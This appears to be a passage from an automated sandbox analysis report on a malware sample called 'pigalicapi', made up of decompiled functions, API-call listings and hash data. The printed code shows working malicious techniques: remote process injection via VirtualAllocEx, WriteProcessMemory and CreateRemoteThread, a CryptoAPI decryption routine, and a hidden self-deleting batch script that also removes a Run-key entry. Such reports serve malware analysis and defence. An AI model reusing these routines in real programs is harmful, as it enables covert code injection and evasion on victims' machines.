                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00EC4C60
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00EC4C77
                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00EC56F0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual$ObjectSingleUninitializeWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2825510553-0
                                                                                                                                                                                                                                                    • Opcode ID: f306b43238d6c95861246e07b3db650082ffa652b7d388d57ceb74dd419d1b59
                                                                                                                                                                                                                                                    • Instruction ID: edc3aa82bb52da82ee90a8d1449de570978b1a3372b414816872f2f18e9efc3d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f306b43238d6c95861246e07b3db650082ffa652b7d388d57ceb74dd419d1b59
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAE06D71B002049FD710CFA5D990FAEBBB0EF58329F645259D845F6240D232E892DB60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC97A0(long _a4) {
                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t4 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
                                                                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                    0x00ec97b0
                                                                                                                                                                                                                                                    0x00ec97b7

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00EC9FB2,?,00EC9FB2,00000000,?,?,?,00EC9E2D), ref: 00EC97A9
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00EC9FB2,00000000,?,?,?,00EC9E2D), ref: 00EC97B0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                                                                                                                    • Opcode ID: 30f24f1c513fe050fa8a70bb81bf95cb347da0c157a3aff7b00f145056deb8ba
                                                                                                                                                                                                                                                    • Instruction ID: 3199c283285909a3f053665055f6207f0f7395ec3028beeac47234760d9b0bdb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30f24f1c513fe050fa8a70bb81bf95cb347da0c157a3aff7b00f145056deb8ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61C09B71140308EFD6409BD9EC2ED95375DF748601F104011F70DD6550CA71A5494762
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00E42C42,00000000,00000000,?,00000000,00000001,00000000,?,00E42670,00000000,00000000,?), ref: 00E42B9E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.858688043.0000000000E42000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E42000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e42000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: 155cb44f56700499559c699fa88ca25f1edce0c1cd65970cabd6a13214daa310
                                                                                                                                                                                                                                                    • Instruction ID: 1f6b0dc4f699245944c595fdf54dbbd1cf49b1171fafafc97c3780760819268b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 155cb44f56700499559c699fa88ca25f1edce0c1cd65970cabd6a13214daa310
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DD05E76700228BFEB106ED4DC06FA9B79CDF456A0F008026FE58AB380D672BE1087D4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                                    			E00EC8CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                    				long* _v12;
                                                                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                    				long* _v24;
                                                                                                                                                                                                                                                    				char* _t31;
                                                                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                                                                    				long** _t35;
                                                                                                                                                                                                                                                    				char* _t52;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                    					L15:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                    					_t31 =  *0xed3370; // 0xecc6e4
                                                                                                                                                                                                                                                    					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                                                                                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                                                                                                    						_t32 = GetLastError();
                                                                                                                                                                                                                                                    						_v16 = _t32;
                                                                                                                                                                                                                                                    						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                    							_t52 =  *0xed3370; // 0xecc6e4
                                                                                                                                                                                                                                                    							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                    						if(_t32 != 0) {
                                                                                                                                                                                                                                                    							_t34 = _a16;
                                                                                                                                                                                                                                                    							__imp__CryptHashData(_v20, _a12, _t34, 0);
                                                                                                                                                                                                                                                    							if(_t34 != 0) {
                                                                                                                                                                                                                                                    								_v24 = 0;
                                                                                                                                                                                                                                                    								_t35 =  &_v24;
                                                                                                                                                                                                                                                    								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
                                                                                                                                                                                                                                                    								if(_t35 != 0) {
                                                                                                                                                                                                                                                    									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                    									CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L15;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                    0x00ec8cf6
                                                                                                                                                                                                                                                    0x00ec8d01
                                                                                                                                                                                                                                                    0x00ec8e1a
                                                                                                                                                                                                                                                    0x00ec8e20
                                                                                                                                                                                                                                                    0x00ec8d25
                                                                                                                                                                                                                                                    0x00ec8d25
                                                                                                                                                                                                                                                    0x00ec8d35
                                                                                                                                                                                                                                                    0x00ec8d3f
                                                                                                                                                                                                                                                    0x00ec8d47
                                                                                                                                                                                                                                                    0x00ec8d49
                                                                                                                                                                                                                                                    0x00ec8d4f
                                                                                                                                                                                                                                                    0x00ec8d59
                                                                                                                                                                                                                                                    0x00ec8d6d
                                                                                                                                                                                                                                                    0x00ec8d78
                                                                                                                                                                                                                                                    0x00ec8d78
                                                                                                                                                                                                                                                    0x00ec8d59
                                                                                                                                                                                                                                                    0x00ec8d82
                                                                                                                                                                                                                                                    0x00ec8d99
                                                                                                                                                                                                                                                    0x00ec8da1
                                                                                                                                                                                                                                                    0x00ec8da5
                                                                                                                                                                                                                                                    0x00ec8db1
                                                                                                                                                                                                                                                    0x00ec8db9
                                                                                                                                                                                                                                                    0x00ec8dbb
                                                                                                                                                                                                                                                    0x00ec8dc2
                                                                                                                                                                                                                                                    0x00ec8dd5
                                                                                                                                                                                                                                                    0x00ec8ddd
                                                                                                                                                                                                                                                    0x00ec8df7
                                                                                                                                                                                                                                                    0x00ec8dfe
                                                                                                                                                                                                                                                    0x00ec8dfe
                                                                                                                                                                                                                                                    0x00ec8ddd
                                                                                                                                                                                                                                                    0x00ec8e08
                                                                                                                                                                                                                                                    0x00ec8e08
                                                                                                                                                                                                                                                    0x00ec8e14
                                                                                                                                                                                                                                                    0x00ec8e14
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec8d82

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00EC8D3F
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EC8D49
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC8D78
                                                                                                                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00EC8D99
                                                                                                                                                                                                                                                    • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00EC8DB1
                                                                                                                                                                                                                                                    • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 00EC8DD5
                                                                                                                                                                                                                                                    • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00EC8DF1
                                                                                                                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00EC8DFE
                                                                                                                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00EC8E08
                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EC8E14
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00EC8D68
                                                                                                                                                                                                                                                    • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00EC8D30
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                    • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                    • Opcode ID: d902606302167c78c022f538fd6527e6478e7729a60fc1b22003b592da1285d9
                                                                                                                                                                                                                                                    • Instruction ID: 4825752d20e92de92d1c0fb4cb23fef36db83264c13ef9468f52a4523b877b96
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d902606302167c78c022f538fd6527e6478e7729a60fc1b22003b592da1285d9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37313A71A40209EFDB14CFA5CE49FAF7778BB04704F24852CF605B6180CBB6AA46CB61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC2510(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				long _v28;
                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                    					L14:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                    					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                    					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                    					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                    					if(_v16 != 0) {
                                                                                                                                                                                                                                                    						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                    						if(_v32 != 0) {
                                                                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                                                                    							E00EC7B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                    							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                    							_v36 = 0;
                                                                                                                                                                                                                                                    							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                    								E00EC7B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                    								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                    								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							E00EC26D0(_v16, _v32);
                                                                                                                                                                                                                                                    							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
                                                                                                                                                                                                                                                    								VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                    								_v28 = 0;
                                                                                                                                                                                                                                                    								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
                                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                    						if(_v32 != 0) {
                                                                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                    0x00ec2516
                                                                                                                                                                                                                                                    0x00ec2521
                                                                                                                                                                                                                                                    0x00ec26c2
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2531
                                                                                                                                                                                                                                                    0x00ec253a
                                                                                                                                                                                                                                                    0x00ec254b
                                                                                                                                                                                                                                                    0x00ec2554
                                                                                                                                                                                                                                                    0x00ec256a
                                                                                                                                                                                                                                                    0x00ec2571
                                                                                                                                                                                                                                                    0x00ec2596
                                                                                                                                                                                                                                                    0x00ec259d
                                                                                                                                                                                                                                                    0x00ec25d7
                                                                                                                                                                                                                                                    0x00ec25e6
                                                                                                                                                                                                                                                    0x00ec25eb
                                                                                                                                                                                                                                                    0x00ec25ee
                                                                                                                                                                                                                                                    0x00ec2600
                                                                                                                                                                                                                                                    0x00ec263c
                                                                                                                                                                                                                                                    0x00ec2641
                                                                                                                                                                                                                                                    0x00ec25fd
                                                                                                                                                                                                                                                    0x00ec25fd
                                                                                                                                                                                                                                                    0x00ec264e
                                                                                                                                                                                                                                                    0x00ec2670
                                                                                                                                                                                                                                                    0x00ec2692
                                                                                                                                                                                                                                                    0x00ec2698
                                                                                                                                                                                                                                                    0x00ec26bf
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec26bf
                                                                                                                                                                                                                                                    0x00ec267d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2683
                                                                                                                                                                                                                                                    0x00ec25b6
                                                                                                                                                                                                                                                    0x00ec25bd
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec25ca
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec25d0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2573

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 00EC2564
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,?,00000000,00003000,00000040), ref: 00EC2590
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 00EC25B0
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC25CA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3668210933-0
                                                                                                                                                                                                                                                    • Opcode ID: 85003e9c07c9e2a6996f47b2174e9f136cd0f0a7592fbc4427117c48ccbf35b0
                                                                                                                                                                                                                                                    • Instruction ID: efe797f6c6bda797cddb9530a4d6a3288b5549c038ac7c6aa50a2d1a6db673b1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85003e9c07c9e2a6996f47b2174e9f136cd0f0a7592fbc4427117c48ccbf35b0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F5129B5E00209EFDB04CF95C995FAEB7B5BB48304F10811CE615BB290D775AA45CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                                    			E00EC74A0() {
                                                                                                                                                                                                                                                    				char _v524;
                                                                                                                                                                                                                                                    				CHAR* _v528;
                                                                                                                                                                                                                                                    				void* _v532;
                                                                                                                                                                                                                                                    				void* _v536;
                                                                                                                                                                                                                                                    				void* _v540;
                                                                                                                                                                                                                                                    				char _v1060;
                                                                                                                                                                                                                                                    				char _v1580;
                                                                                                                                                                                                                                                    				char _v2364;
                                                                                                                                                                                                                                                    				long _v2368;
                                                                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v2384;
                                                                                                                                                                                                                                                    				long _v2388;
                                                                                                                                                                                                                                                    				struct _STARTUPINFOA _v2460;
                                                                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                                                                    				void* _t121;
                                                                                                                                                                                                                                                    				void* _t123;
                                                                                                                                                                                                                                                    				void* _t124;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				E00EC7D20(E00EC7D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
                                                                                                                                                                                                                                                    				_t123 = _t121 + 0x18;
                                                                                                                                                                                                                                                    				 *0xed4370 = 1;
                                                                                                                                                                                                                                                    				Sleep(0x3e8);
                                                                                                                                                                                                                                                    				if(( *0xed4362 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    					_v2368 = 0x207;
                                                                                                                                                                                                                                                    					if(( *0xed435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					lstrcatA( &_v1060, "\\");
                                                                                                                                                                                                                                                    					lstrcatA( &_v1060, "pigalicapi");
                                                                                                                                                                                                                                                    					lstrcatA( &_v1060, ".exe");
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					GetModuleFileNameA(0,  &_v1060, 0x207);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				SetFileAttributesA( &_v1060, 0x80);
                                                                                                                                                                                                                                                    				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
                                                                                                                                                                                                                                                    				_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                    				if( *0xed436c != 0) {
                                                                                                                                                                                                                                                    					_t86 =  *0xed436c; // 0x238
                                                                                                                                                                                                                                                    					TerminateThread(_t86, 1);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v528 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                    				_v532 = 0x80000001;
                                                                                                                                                                                                                                                    				if(( *0xed435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    					_v532 = 0x80000002;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v536 = 0;
                                                                                                                                                                                                                                                    				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
                                                                                                                                                                                                                                                    					RegDeleteValueA(_v536, "pigalicapi");
                                                                                                                                                                                                                                                    					RegCloseKey(_v536);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(( *0xed435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    					E00EC5E30(1);
                                                                                                                                                                                                                                                    					_t124 = _t124 + 4;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
                                                                                                                                                                                                                                                    				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
                                                                                                                                                                                                                                                    				lstrcatA( &_v524, ".bat");
                                                                                                                                                                                                                                                    				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                    				_v540 = _t71;
                                                                                                                                                                                                                                                    				if(_v540 != 0xffffffff) {
                                                                                                                                                                                                                                                    					_v2388 = 0;
                                                                                                                                                                                                                                                    					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
                                                                                                                                                                                                                                                    					E00EC7D20(E00EC7D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
                                                                                                                                                                                                                                                    					_v2460.cb = 0x44;
                                                                                                                                                                                                                                                    					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
                                                                                                                                                                                                                                                    					_v2460.wShowWindow = 0;
                                                                                                                                                                                                                                                    					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
                                                                                                                                                                                                                                                    						_t71 = CloseHandle(_v2384.hThread);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					ExitProcess(0);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t71;
                                                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                                                    0x00ec74cd
                                                                                                                                                                                                                                                    0x00ec74d2
                                                                                                                                                                                                                                                    0x00ec74d5
                                                                                                                                                                                                                                                    0x00ec74e4
                                                                                                                                                                                                                                                    0x00ec74f3
                                                                                                                                                                                                                                                    0x00ec750b
                                                                                                                                                                                                                                                    0x00ec751e
                                                                                                                                                                                                                                                    0x00ec7547
                                                                                                                                                                                                                                                    0x00ec7520
                                                                                                                                                                                                                                                    0x00ec752e
                                                                                                                                                                                                                                                    0x00ec752e
                                                                                                                                                                                                                                                    0x00ec7559
                                                                                                                                                                                                                                                    0x00ec756b
                                                                                                                                                                                                                                                    0x00ec757d
                                                                                                                                                                                                                                                    0x00ec74f5
                                                                                                                                                                                                                                                    0x00ec7503
                                                                                                                                                                                                                                                    0x00ec7503
                                                                                                                                                                                                                                                    0x00ec758f
                                                                                                                                                                                                                                                    0x00ec75b4
                                                                                                                                                                                                                                                    0x00ec75ba
                                                                                                                                                                                                                                                    0x00ec75c4
                                                                                                                                                                                                                                                    0x00ec75c8
                                                                                                                                                                                                                                                    0x00ec75ce
                                                                                                                                                                                                                                                    0x00ec75ce
                                                                                                                                                                                                                                                    0x00ec75d4
                                                                                                                                                                                                                                                    0x00ec75de
                                                                                                                                                                                                                                                    0x00ec75f1
                                                                                                                                                                                                                                                    0x00ec75f3
                                                                                                                                                                                                                                                    0x00ec75f3
                                                                                                                                                                                                                                                    0x00ec75fd
                                                                                                                                                                                                                                                    0x00ec7628
                                                                                                                                                                                                                                                    0x00ec7636
                                                                                                                                                                                                                                                    0x00ec7643
                                                                                                                                                                                                                                                    0x00ec7643
                                                                                                                                                                                                                                                    0x00ec7652
                                                                                                                                                                                                                                                    0x00ec7656
                                                                                                                                                                                                                                                    0x00ec765b
                                                                                                                                                                                                                                                    0x00ec765b
                                                                                                                                                                                                                                                    0x00ec766f
                                                                                                                                                                                                                                                    0x00ec7698
                                                                                                                                                                                                                                                    0x00ec76aa
                                                                                                                                                                                                                                                    0x00ec76c6
                                                                                                                                                                                                                                                    0x00ec76cc
                                                                                                                                                                                                                                                    0x00ec76d9
                                                                                                                                                                                                                                                    0x00ec76df
                                                                                                                                                                                                                                                    0x00ec770e
                                                                                                                                                                                                                                                    0x00ec773f
                                                                                                                                                                                                                                                    0x00ec7747
                                                                                                                                                                                                                                                    0x00ec775a
                                                                                                                                                                                                                                                    0x00ec7762
                                                                                                                                                                                                                                                    0x00ec7794
                                                                                                                                                                                                                                                    0x00ec779d
                                                                                                                                                                                                                                                    0x00ec779d
                                                                                                                                                                                                                                                    0x00ec77a5
                                                                                                                                                                                                                                                    0x00ec77a5
                                                                                                                                                                                                                                                    0x00ec77ae

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00EC74E4
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 00EC7503
                                                                                                                                                                                                                                                    • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 00EC752E
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00ECC650), ref: 00EC7559
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,pigalicapi), ref: 00EC756B
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,.exe), ref: 00EC757D
                                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080), ref: 00EC758F
                                                                                                                                                                                                                                                    • wnsprintfA.SHLWAPI ref: 00EC75B4
                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000238,00000001), ref: 00EC75CE
                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,00ECC690,00000000,00000002,00000000), ref: 00EC7620
                                                                                                                                                                                                                                                    • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 00EC7636
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EC7643
                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 00EC766F
